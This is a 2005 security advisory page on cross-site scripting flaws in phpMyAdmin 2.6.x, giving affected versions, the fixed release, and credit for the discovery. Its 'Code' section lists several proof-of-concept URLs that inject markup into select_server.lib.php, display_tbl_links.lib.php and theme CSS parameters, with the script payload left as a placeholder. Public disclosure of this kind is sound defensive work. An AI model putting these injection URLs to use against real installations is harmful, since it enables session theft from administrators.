exploits , vulnerabilities , articles , PHPMyAdmin Multiple Libraries And Themes Remote Cross-Site Scripting Vulnerabilities

Title	PHPMyAdmin Multiple Libraries And Themes Remote Cross-Site Scripting Vulnerabilities
Published	2005-02-24-12:00AM
Updated	2005-03-04-05:18PM
Class	Input Validation Error
CVE	CVE-MAP-NOMATCH
Remote	Yes
Local	No
Credit	Maksymilian Arciemowicz <max@jestsuper.pl> is credited with the discovery of these issues.
Vulnerable	S.u.S.E. Linux Personal 9.2 x86_64 S.u.S.E. Linux Personal 9.2 S.u.S.E. Linux Personal 9.1 x86_64 S.u.S.E. Linux Personal 9.1 S.u.S.E. Linux Personal 9.0 x86_64 S.u.S.E. Linux Personal 9.0 S.u.S.E. Linux Personal 8.2 phpMyAdmin phpMyAdmin 2.6.1 rc1 phpMyAdmin phpMyAdmin 2.6.1 phpMyAdmin phpMyAdmin 2.6 .0pl3 phpMyAdmin phpMyAdmin 2.6 .0pl2 Gentoo Linux Gentoo Linux 1.4
Not Vulnerable	phpMyAdmin phpMyAdmin 2.6.1 pl1
Code	No exploit is required to leverage any of these issues. The following proof of concepts have been provided: http://www.example.com/phpMyAdmin/libraries/select_server.lib.php?cfg[Servers][cXIb8O3]=toja&cfg[Servers][sp3x]=toty&show_server_left=MyToMy&strServer=[XSS%20code] http://www.example.com/phpMyAdmin/libraries/select_server.lib.php?cfg[Servers][cXIb8O3]=toja&cfg[Servers][sp3x]=toty&cfg[BgcolorOne]=777777%22%3E%3CH1%3E[XSS%20code] http://www.example.com/phpMyAdmin/libraries/select_server.lib.php?cfg[Servers][cXIb8O3]=toja&cfg[Servers][sp3x]=toty&strServerChoice=%3CH1%3EXSS http://www.example.com/phpMyAdmin/libraries/display_tbl_links.lib.php?doWriteModifyAt=left&del_url=Smutno&is_display[del_lnk]=Mi&bgcolor=%22%3E[XSS%20code] http://www.example.com/phpMyAdmin/libraries/display_tbl_links.lib.php?doWriteModifyAt=left&del_url=Smutno&is_display[del_lnk]=Mi&row_no=%22%3E[XSS%20code] http://www.example.com/phpMyAdmin/themes/original/css/theme_left.css.php?num_dbs=0&left_font_family=[XSS] http://www.example.com/phpMyAdmin/themes/original/css/theme_right.css.php?right_font_family=[XSS]
TXT

Vulnerabilities - newest 10 RSS | More

• 2008-12-01 SystemImager Flamethrower Insecure Temporary File Creation Vulnerabilities
• 2008-12-01 Rumpus FTP Server Command Argument Remote Buffer Overflow Vulnerability
• 2008-12-01 Rumpus FTP Server HTTP Command Remote Denial of Service Vulnerability
• 2008-11-29 Multiple ActiveWebSoftwares Products Login Parameters SQL Injection Vulnerabilities
• 2008-11-29 Venalsur Booking Centre Multiple Cross-Site Scripting Vulnerabilities
• 2008-11-28 ReVou Login SQL Injection Vulnerability
• 2008-11-28 Web Calendar System SQL Injection and Cross Site Scripting Vulnerabilities
• 2008-11-28 SailPlanner Login SQL Injection Vulnerability
• 2008-11-28 Livio.net WEB Calendar Cross Site Scripting and Multiple SQL Injection Vulnerabilities
• 2008-11-28 Subtext Anchor Tags HTML Injection Vulnerability

• Vulnerabilities
• Exploits
• News
• Articles

Copyright 2007, SecurityDot
Tue, 02 Dec 2008 04:06:59 +0000